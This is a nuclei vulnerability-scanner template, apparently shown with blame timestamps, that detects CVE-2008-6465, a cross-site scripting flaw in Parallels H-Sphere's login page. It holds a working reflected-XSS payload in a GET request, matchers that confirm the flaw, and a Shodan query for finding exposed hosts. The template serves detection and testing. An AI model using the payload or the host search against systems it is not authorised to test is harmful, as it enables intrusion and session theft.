nuclei-templates/http/cves/2008/CVE-2008-6465.yaml

56 lines
1.9 KiB
YAML
Raw Normal View History

2022-11-06 12:41:14 +00:00
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
2022-11-06 12:41:14 +00:00
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
2022-11-06 12:41:14 +00:00
reference:
- http://www.xssing.com/index.php?x=3&y=65
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
2022-11-12 07:20:30 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
2022-11-06 12:41:14 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
2022-11-06 12:41:14 +00:00
cve-id: CVE-2008-6465
2023-07-11 19:49:27 +00:00
cwe-id: CWE-79
epss-score: 0.00421
epss-percentile: 0.71439
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
2022-11-12 02:32:13 +00:00
metadata:
2022-11-12 07:20:30 +00:00
verified: true
2023-09-06 13:22:34 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: parallels
product: h-sphere
2023-09-06 13:22:34 +00:00
shodan-query: title:"Parallels H-Sphere
2022-11-12 07:20:30 +00:00
tags: cve,cve2008,xss,parallels,h-sphere
2022-11-06 12:41:14 +00:00
http:
2022-11-12 02:32:13 +00:00
- method: GET
path:
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
2022-11-06 12:41:14 +00:00
matchers-condition: and
matchers:
- type: word
2022-11-12 02:32:13 +00:00
part: body
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- '\" onfocus=alert(document.domain); autofocus'
- 'Please enter login name & password'
2022-11-12 02:37:51 +00:00
condition: and
2022-11-06 12:41:14 +00:00
- type: word
2022-11-12 02:32:13 +00:00
part: header
2022-11-06 12:41:14 +00:00
words:
2022-11-12 02:32:13 +00:00
- 'text/html'
- type: status
status:
- 200
# digest: 490a0046304402200b9a12b2e8e3b2e5a0e69a02655f45ef6e8765c61a0a72521bebfc03c6eff5950220217ff3511cd0bcdc0f0910bd2e6f90932b40ab16615a4f876cdfe015111613b7:922c64590222798bb761d5b6d8e72950